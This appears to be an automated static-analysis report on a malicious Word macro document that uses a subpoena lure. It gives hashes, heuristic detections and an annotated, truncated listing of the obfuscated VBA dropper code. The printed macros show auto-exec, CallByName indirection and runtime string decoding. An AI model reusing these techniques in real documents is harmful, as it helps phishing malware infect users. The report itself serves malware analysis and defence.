Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 9a9761a8158b8f8c…

MALICIOUS

Office (OLE)

109.0 KB · Created: 2016-04-27 16:07:00 · Authoring application: Microsoft Office Word · First seen: 2019-03-10. (The creation timestamp and authoring application are read from the document's own OLE metadata, which the author controls; do not rely on them as a timeline anchor — the "first seen" date is the only externally observed one.)
MD5: a8cfa0d684e7da951f196dadf0ae777c SHA-1: 65cd0f69fabdae4ad5e4d4a78ff695a94f9329c0 SHA-256: 9a9761a8158b8f8c8431b757f9326d604652651286547a6c7a68913eac08781f
Risk score: 282

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains VBA macros, including a Document_Open auto-exec handler, so the payload runs as soon as the user enables macros. The extracted source is heavily obfuscated: every string it uses (member names, ProgIDs, paths) is produced at runtime by a decoder routine (nclOESQBrSf, taking a module constant and an integer), and COM members are invoked indirectly through CallByName wrappers in modules U2GPMn00xXx and evslot, which keeps the real method names out of the static listing. Together with the CreateObject/GetObject heuristic hits, the visible flow — create an object from a decoded string, call a member with two arguments and False, read an integer result and abort unless it matches an expected value, then build a string with a random component and pass it to two further routines — is consistent with a downloader that writes and launches a second-stage payload, but that is an inference: the download URL was not recovered statically (the only extracted URL is a benign schema namespace), so decoding the strings or detonating the sample in a sandbox is required to obtain network IOCs. The document body presents a subpoena to lure the user into enabling macros.

Heuristics 8

  • ClamAV: Doc.Dropper.Agent-1399074 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-1399074
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://schemas.openxmlformats.org/drawingml/2006/main — in document text (OLE body). This is the standard DrawingML XML namespace found in ordinary Office files; it is not an indicator of compromise and should not be blocklisted. No attacker-controlled URL was recovered by static analysis.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 14360 bytes
SHA-256: fc615b8cb3a9096e06fb4d59a9c6e4e58d6b1cd102ef1a0abe19230fab3cdfc6
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Auto-exec entry point: runs as soon as the document is opened with macros enabled.
' Its only action is to hand off to QQeu4iQ9ZhW in module TlZjc2De8, which is not
' part of this excerpt, so the first real step of the chain is not visible here.
Private Sub Document_Open()
TlZjc2De8.QQeu4iQ9ZhW
End Sub
' Second-stage routine (its caller is not visible in this excerpt). Every string it
' passes around comes from nclOESQBrSf(<member of mLug7isEYOXiC>, <integer>), a decoder
' defined outside this excerpt (referenced elsewhere as TlZjc2De8.nclOESQBrSf), so the
' member names, ProgID and any URL cannot be read from the static listing.
Public Sub yj5zhKqBmrCl9PP()
Dim c3wXPiAOmzJYx As Object
Dim EVZTdzs As Integer
Dim DMkguWXTWAJm7sH As Variant
Dim oajqhL As Variant
' Any runtime error jumps to the empty label at the bottom: failures are swallowed silently.
On Error GoTo FPSPmRELh0f
' Obtains an object through evslot.yPZ74txZOio (see that module) with one decoded argument
' and one value from U2GPMn00xXx that is not in the visible part of that module.
Set c3wXPiAOmzJYx = evslot.yPZ74txZOio(nclOESQBrSf(mLug7isEYOXiC.gyClXPESEhF, 48), U2GPMn00xXx.SKW2fm)
' VriImfWA1KN is a CallByName property-get wrapper: reads a member selected by decoded name.
EVZTdzs = VriImfWA1KN(c3wXPiAOmzJYx, nclOESQBrSf(mLug7isEYOXiC.uzNQPlLRAj, 114))
' Bails out (into the silent handler) unless the integer equals a value from hBOZusH,
' a module outside this excerpt. Reads like a status/result check -- confirm by decoding.
If EVZTdzs <> hBOZusH.GX4JInHqlx3rYNy Then
Err.Raise Number:=1
End If
' Second property read by decoded name; the result is later handed to wtmQYPJ.
DMkguWXTWAJm7sH = VriImfWA1KN(c3wXPiAOmzJYx, nclOESQBrSf(mLug7isEYOXiC.zsuVrFdyiyBmqa, 340))
' Concatenates three parts; cJuUNRrq8exCZ is derived from Rnd (see U2GPMn00xXx),
' so the resulting string has a per-run random component.
oajqhL = U2GPMn00xXx.kG3kv8x & hBOZusH.qXC4lks3p & U2GPMn00xXx.cJuUNRrq8exCZ
' wtmQYPJ and hsdrPqpzSAt are defined outside this excerpt. The (string, data) then
' (string) call order is consistent with write-then-use of a file path -- unverified.
wtmQYPJ oajqhL, DMkguWXTWAJm7sH
hsdrPqpzSAt oajqhL
Exit Sub
' Empty error handler: nothing is logged or retried.
FPSPmRELh0f:
End Sub

Attribute VB_Name = "mLug7isEYOXiC"
Attribute VB_Base = "0{64E31D02-CDB4-4F26-8405-68C97F3169F6}{A702B371-FEAA-44A3-B829-DEDEBA91BDC8}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "evslot"
' Module-private constant. It is not referenced anywhere in the visible portion of
' the listing; may be decoy data or may be consumed by code beyond the truncation point.
Private Const vOTRpfGyCjYaAXtBKr As String = "rEqe5nNAVJbstLc9o"
' Object factory used by ThisDocument.yj5zhKqBmrCl9PP: creates an object from a decoded
' string, then invokes two helpers from TlZjc2De8 (outside this excerpt) on it using
' decoded member names. Both caller-supplied arguments are forwarded to the first helper.
Public Function yPZ74txZOio(ByVal ksBf8QOMgTj As Variant, ByVal EynrZa36t As Variant) As Variant
' xKBUnEo2fp takes only a decoded string and yields an object. That shape, plus the
' OLE_VBA_CREATEOBJ heuristic hit, suggests a CreateObject(ProgID) wrapper -- not confirmed here.
Set yPZ74txZOio = ZvpNmOJjZe.xKBUnEo2fp(TlZjc2De8.nclOESQBrSf(mLug7isEYOXiC.GRZAWXBhbl, 873))
' Call shape: object, decoded name, two caller values, False. Together with the
' single-name call below this matches an Open(method, url, async:=False) / Send
' sequence on an HTTP object -- a hypothesis to confirm by decoding the strings.
TlZjc2De8.bBFHwI0Tji yPZ74txZOio, TlZjc2De8.nclOESQBrSf(mLug7isEYOXiC.tAannniEZ, 65), ksBf8QOMgTj, EynrZa36t, False
' Second call on the same object with only a decoded member name.
TlZjc2De8.n3l2A8olHz8c yPZ74txZOio, TlZjc2De8.nclOESQBrSf(mLug7isEYOXiC.oPalzXQSuK, 68)
End Function
' Always returns 0. No caller appears in the visible listing; likely filler used to
' pad the module and dilute signature matching, though that cannot be confirmed here.
Public Function lkHsb4gDkL() As Integer
lkHsb4gDkL = 0
End Function
' Returns a Variant array of six decoded strings (Kshb5HhPC9yf in U2GPMn00xXx simply
' returns its ParamArray). The decoded values and the consumer of this array are not
' visible in this excerpt.
Public Function xIJO9if64KwwoxM() As Variant
xIJO9if64KwwoxM = U2GPMn00xXx.Kshb5HhPC9yf(TlZjc2De8.nclOESQBrSf(mLug7isEYOXiC.mxPoTjbX, 116), TlZjc2De8.nclOESQBrSf(mLug7isEYOXiC.mkZHhwcJa, 132), TlZjc2De8.nclOESQBrSf(mLug7isEYOXiC.KVWdFbtc, 132), TlZjc2De8.nclOESQBrSf(mLug7isEYOXiC.iGtMYvsOYp, 108), TlZjc2De8.nclOESQBrSf(mLug7isEYOXiC.GyELCwmBxXz, 164), TlZjc2De8.nclOESQBrSf(mLug7isEYOXiC.EPqDUnY, 185))
End Function
' Private; always returns 1442. No caller in the visible listing (possible filler).
Private Function SPKhXgyYpkGt() As Integer
SPKhXgyYpkGt = 1442
End Function
' Returns 3170 divided by TlZjc2De8.fFS4YCN (defined outside this excerpt). The
' floating-point quotient is coerced to Integer on assignment; a zero divisor would
' raise a runtime error. No caller visible here.
Public Function xdCXs90ZjRT1QzF() As Integer
xdCXs90ZjRT1QzF = 3170 / TlZjc2De8.fFS4YCN
End Function
' Passes one decoded string through TlZjc2De8.WsJ9yFZs (outside this excerpt) and
' returns the result. Same shape as U2GPMn00xXx.kG3kv8x; no caller visible here.
Public Function rHAZXbgS5Ka() As Variant
rHAZXbgS5Ka = TlZjc2De8.WsJ9yFZs(TlZjc2De8.nclOESQBrSf(mLug7isEYOXiC.qPLWKDTnuKCoPT, 147))
End Function
' Always returns 2. No caller in the visible listing (possible filler).
Public Function A4VmYVPINyAof() As Integer
A4VmYVPINyAof = 2
End Function
' Returns U2GPMn00xXx.ruGHXG when either of two U2GPMn00xXx flags is set, otherwise True.
' None of the three members is in the visible part of U2GPMn00xXx (the listing is
' truncated). Reads like a conditional gate; no caller visible in this excerpt.
Public Function CEtfkJI1() As Boolean
If U2GPMn00xXx.lEiihgAN54Gs0mL Or U2GPMn00xXx.CWDoi639bQ Then
CEtfkJI1 = U2GPMn00xXx.ruGHXG
Else
CEtfkJI1 = True
End If
End Function

Attribute VB_Name = "U2GPMn00xXx"
' CallByName wrapper: invokes method Vl1NpbO6FtY on dNScBRLkoFP with one argument
' (call type 1 = vbMethod) and returns the resulting object. Used so the method name
' never appears as a literal in the source. No caller visible in this excerpt.
Public Function LwtDwU4K(ByVal dNScBRLkoFP As Object, ByVal Vl1NpbO6FtY As String, ByVal drLRiTo4jZw1p As Variant) As Variant
Set LwtDwU4K = CallByName(dNScBRLkoFP, Vl1NpbO6FtY, 1, drLRiTo4jZw1p)
End Function
' CallByName wrapper: reads property cuLxHH62OJu7 of dNScBRLkoFP (call type 2 = vbGet).
' Called from ThisDocument.yj5zhKqBmrCl9PP with decoded property names and from pnkBfasJXi.
Public Function VriImfWA1KN(ByVal dNScBRLkoFP As Object, ByVal cuLxHH62OJu7 As String) As Variant
VriImfWA1KN = CallByName(dNScBRLkoFP, cuLxHH62OJu7, 2)
End Function
' Returns TlZjc2De8.WsJ9yFZs applied to one decoded string (WsJ9yFZs is outside this
' excerpt). Used as the first part of the concatenated string in yj5zhKqBmrCl9PP.
Public Function kG3kv8x() As Variant
kG3kv8x = TlZjc2De8.WsJ9yFZs(TlZjc2De8.nclOESQBrSf(mLug7isEYOXiC.BzZfUYoGyS, 75))
End Function
' Private CallByName wrapper: invokes method Vl1NpbO6FtY on dNScBRLkoFP with two
' arguments (call type 1 = vbMethod); result discarded. No caller visible in this excerpt.
Private Sub lWQz0T7mr(ByVal dNScBRLkoFP As Variant, ByVal Vl1NpbO6FtY As Variant, ByVal P4FL9kETbRJ As Variant, ByVal FsRcQJ8vgmMYOq As Variant)
CallByName dNScBRLkoFP, Vl1NpbO6FtY, 1, P4FL9kETbRJ, FsRcQJ8vgmMYOq
End Sub
' Reads a property of ThisDocument selected by a decoded name (via the vbGet wrapper).
' Reading document properties by hidden name is a common way to pull embedded data out
' of the document itself, but the property and its use are not visible here -- verify.
Private Function pnkBfasJXi() As Variant
pnkBfasJXi = VriImfWA1KN(ThisDocument, TlZjc2De8.nclOESQBrSf(mLug7isEYOXiC.jBDagKNjX, 75))
End Function
' Identity over a ParamArray: returns its arguments as a Variant array. Used by
' evslot.xIJO9if64KwwoxM to bundle six decoded strings.
Public Function Kshb5HhPC9yf(ParamArray VxplD2mN33P() As Variant) As Variant
Kshb5HhPC9yf = VxplD2mN33P
End Function
Public Function cJuUNRrq8exCZ() As String
cJuUNRrq8exCZ = TlZjc2De8.EQyqPA(Rnd)
End Fun
... (truncated)